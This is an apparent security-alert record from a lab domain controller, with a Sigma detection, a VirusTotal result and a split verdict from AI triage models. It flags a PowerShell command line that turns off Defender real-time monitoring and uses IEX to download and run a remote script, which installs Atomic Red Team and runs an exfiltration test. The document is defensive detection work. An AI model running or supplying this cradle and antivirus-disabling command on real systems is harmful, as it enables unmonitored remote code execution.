{
  "author": "_ext-sigma-7a14fbc3-54d9-4b4d-8700-61eddada04f0[bulk][segment]",
  "cat": "PowerShell Download and Execution Cradles",
  "detect": {
    "event": {
      "BASE_ADDRESS": 140694944940032,
      "COMMAND_LINE": "PowerShell.exe  Set-ExecutionPolicy Unrestricted ; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 ; Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force; Set-MpPreference -DisableRealtimeMonitoring $true ; IEX (IWR \u0027https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1\u0027 -UseBasicParsing) ; Install-AtomicRedTeam -Force -getAtomics; Invoke-AtomicTest T1567.003 -CheckPrereqs ; Invoke-AtomicTest T1567.003 -GetPrereqs ; Invoke-AtomicTest T1567.003 ",
      "FILE_IS_SIGNED": 1,
      "FILE_PATH": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
      "HASH": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
      "MEMORY_USAGE": 143122432,
      "PARENT": {
        "BASE_ADDRESS": 140698856259584,
        "COMMAND_LINE": "cmd.exe /C C:\\Windows\\TEMP\\pld368E.tmp.bat T1567.003 ",
        "FILE_IS_SIGNED": 1,
        "FILE_PATH": "C:\\Windows\\System32\\cmd.exe",
        "HASH": "3656f37a1c6951ec4496fabb8ee957d3a6e3c276d5a3785476b482c9c0d32ea2",
        "MEMORY_USAGE": 4661248,
        "PARENT_ATOM": "d2b1ecad7af81b32ac16ae0d69c2a7fe",
        "PARENT_PROCESS_ID": 3496,
        "PROCESS_ID": 7640,
        "THIS_ATOM": "45e4e3418a6f8c858f274b1569c2a828",
        "THREADS": 3,
        "TIMESTAMP": 1774364711483,
        "USER_NAME": "NT AUTHORITY\\SYSTEM"
      },
      "PARENT_PROCESS_ID": 7640,
      "PROCESS_ID": 3268,
      "THREADS": 33,
      "USER_NAME": "NT AUTHORITY\\SYSTEM"
    },
    "routing": {
      "arch": 2,
      "did": "",
      "event_id": "db1e086f-3311-40f1-a0bf-1eded3473d79",
      "event_time": 1774364713278,
      "event_type": "NEW_PROCESS",
      "ext_ip": "67.60.122.240",
      "hostname": "df-labsdc01.dflabs.local",
      "iid": "47501359-645e-4049-906e-e6195da7afcf",
      "int_ip": "192.168.45.129",
      "latency": 3047,
      "moduleid": 2,
      "oid": "ad19afae-3759-4207-b06e-8648b225c455",
      "parent": "45e4e3418a6f8c858f274b1569c2a828",
      "plat": 268435456,
      "sid": "e4a1c62d-4d1f-4472-bae4-43291246b4d4",
      "tags": [
        "domain-controller",
        "fusion-soc-alert",
        "fusion-soc-case",
        "fusion-soc-pulled",
        "fusion-soc-triage"
      ],
      "this": "59a8d473d7fb33057005984369c2a82b"
    }
  },
  "detect_id": "972e4d30-bbf2-4fad-8085-6ba569c2a82c",
  "detect_mtd": {
    "author": "Florian Roth (Nextron Systems)",
    "description": "Detects PowerShell download and execution cradles.",
    "falsepositives": [
      "Some PowerShell installers were seen using similar combinations. Apply filters accordingly"
    ],
    "level": "high",
    "references": [
      "https://github.com/VirtualAlllocEx/Payload-Download-Cradles/blob/88e8eca34464a547c90d9140d70e9866dcbc6a12/Download-Cradles.cmd",
      "https://labs.withsecure.com/publications/fin7-target-veeam-servers"
    ],
    "tags": [
      "attack.execution",
      "attack.t1059"
    ]
  },
  "gen_time": 1774364716327,
  "link": "https://app.limacharlie.io/orgs/ad19afae-3759-4207-b06e-8648b225c455/sensors/e4a1c62d-4d1f-4472-bae4-43291246b4d4/timeline?time=1774364713\u0026selected=59a8d473d7fb33057005984369c2a82b",
  "namespace": "general",
  "routing": {
    "arch": 2,
    "did": "",
    "event_id": "db1e086f-3311-40f1-a0bf-1eded3473d79",
    "event_time": 1774364713278,
    "event_type": "NEW_PROCESS",
    "ext_ip": "67.60.122.240",
    "hostname": "df-labsdc01.dflabs.local",
    "iid": "47501359-645e-4049-906e-e6195da7afcf",
    "int_ip": "192.168.45.129",
    "latency": 3047,
    "moduleid": 2,
    "oid": "ad19afae-3759-4207-b06e-8648b225c455",
    "parent": "45e4e3418a6f8c858f274b1569c2a828",
    "plat": 268435456,
    "sid": "e4a1c62d-4d1f-4472-bae4-43291246b4d4",
    "tags": [
      "domain-controller",
      "fusion-soc-alert",
      "fusion-soc-case",
      "fusion-soc-pulled",
      "fusion-soc-triage"
    ],
    "this": "59a8d473d7fb33057005984369c2a82b"
  },
  "rule_tags": [
    "attack.execution",
    "attack.t1059",
    "ext:ext-sigma"
  ],
  "source": "ad19afae-3759-4207-b06e-8648b225c455.47501359-645e-4049-906e-e6195da7afcf.e4a1c62d-4d1f-4472-bae4-43291246b4d4.10000000.2",
  "source_rule": "service.windows_process_creation/proc_creation_win_powershell_download_iex",
  "ts": 1774364716000
}

{
  "virustotal": {
    "malicious": false,
    "provider": "virustotal",
    "reputation": 73,
    "stats": {
      "confirmed-timeout": 0,
      "failure": 0,
      "harmless": 0,
      "malicious": 0,
      "suspicious": 0,
      "timeout": 0,
      "type-unsupported": 4,
      "undetected": 72
    }
  }
}

{
  "confidence": 0.85,
  "false_positive_reason": null,
  "investigation_questions": [
    "What is the purpose of disabling real-time monitoring?",
    "Are there any other processes spawned by this parent process?",
    "Has this host been previously compromised or used for testing?",
    "Is this a legitimate security assessment or unauthorized activity?"
  ],
  "ioc_analysis": "The process is running PowerShell.exe from its expected location (C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe), but the command line contains malicious indicators including IEX (Invoke-Expression) to download and execute code from an external URL, disabling antivirus monitoring, and installing offensive security tools.",
  "iocs_extracted": [
    "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    "Set-ExecutionPolicy Unrestricted",
    "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12",
    "Install-PackageProvider -Name NuGet",
    "Set-MpPreference -DisableRealtimeMonitoring $true",
    "IEX (IWR \u0027https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1\u0027 -UseBasicParsing)",
    "Install-AtomicRedTeam -Force -getAtomics",
    "Invoke-AtomicTest T1567.003"
  ],
  "mitre_techniques": [
    "T1567.003",
    "T1059.004",
    "T1218.001"
  ],
  "recommended_actions": [
    "Manual analyst review required \u2014 AI models (split)",
    "Isolate the host from the network immediately",
    "Block external URLs at the firewall level",
    "Review and disable PowerShell execution policy",
    "Analyze process tree for additional malicious processes",
    "Check for persistence mechanisms in startup locations"
  ],
  "risk_score": 90,
  "severity": "high",
  "summary": "**Vote: SPLIT (1/2 -\u003e SUSPICIOUS)**\n\n### \u264a gemini-cli Analysis (Primary)\nFailed or timed out.\n\n---\n\n### \ud83e\udd16 qwen3.5:4b Analysis (Secondary)\n**Verdict:** true_positive | **Confidence:** 0.95\nThis event represents a confirmed malicious PowerShell execution using IEX to download and execute code from an external GitHub repository. The command line explicitly disables real-time monitoring and installs the Atomic Red Team framework for offensive security testing.\n\n**IOC Analysis:** The process is running PowerShell.exe from its expected location (C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe), but the command line contains malicious indicators including IEX (Invoke-Expression) to download and execute code from an external URL, disabling antivirus monitoring, and installing offensive security tools.\n\n---\n\n### \ud83e\udd16 deepseek-r1:8b Analysis (Secondary)\n**Verdict:** suspicious | **Confidence:** 0.75\nA PowerShell process was executed with SYSTEM privileges, attempting to change execution policies, disable real-time monitoring, and download a script from GitHub. The parent process is a temporary batch file, indicating potential malicious intent.\n\n**IOC Analysis:** The FILE_PATH is a legitimate PowerShell executable in System32, but the command line shows suspicious actions including setting unrestricted execution policy, disabling security protocols, and downloading a script. The parent process is a temporary batch file, which is a common false positive scenario but in this context, it suggests malicious activity.",
  "verdict": "suspicious",
  "voting": {
    "auto_action": "manual_review",
    "mode": "split",
    "total_models": 2,
    "vote_summary": [
      "qwen3.5:4b: true_positive (critical, 95% confidence)",
      "deepseek-r1:8b: suspicious (high, 75% confidence)"
    ],
    "votes": [
      {
        "confidence": 0.95,
        "model": "qwen3.5:4b",
        "verdict": "true_positive"
      },
      {
        "confidence": 0.75,
        "model": "deepseek-r1:8b",
        "verdict": "suspicious"
      }
    ],
    "winning_count": 1,
    "winning_verdict": "suspicious"
  }
}